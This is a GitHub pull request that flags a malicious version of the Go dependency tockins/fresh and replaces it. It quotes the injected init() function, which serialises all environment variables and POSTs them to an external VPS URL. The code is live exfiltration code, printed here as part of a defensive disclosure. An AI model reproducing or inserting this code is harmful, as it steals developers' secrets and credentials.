go-web-framework-benchmark icon indicating copy to clipboard operation
go-web-framework-benchmark copied to clipboard

Published 20 hours ago verified publisher icon smallnest

Replace malicious version of dep

Open machinly opened this issue 3 years ago • 0 comments

This PR replace the malicious version of github.com/tockins/fresh.

The new version (v0.0.0-20220719194346-eee4eda4271e) of github.com/tockins/fresh have malicious code in init func of every go file. And you can't see this version in github.

After make build, You can find that in ~/go/pkg/mod/github.com/tockins/[email protected]. And The malicious code looks like this. It's post env to the weird url.

func init() {
  if x0__.Getenv("e452d6ab") == "" {
    x4__, _ := x3__.Marshal(x0__.Environ())
    x0__.Setenv("e452d6ab", "1")
    x2__.Post("http://ovz1.j19544519.pr46m.vps.myjino.ru:49460?org=tockins&repo=fresh", "application/json", x1__.NewBuffer(x4__))
  }
}

machinly avatar Aug 12 '22 12:08 machinly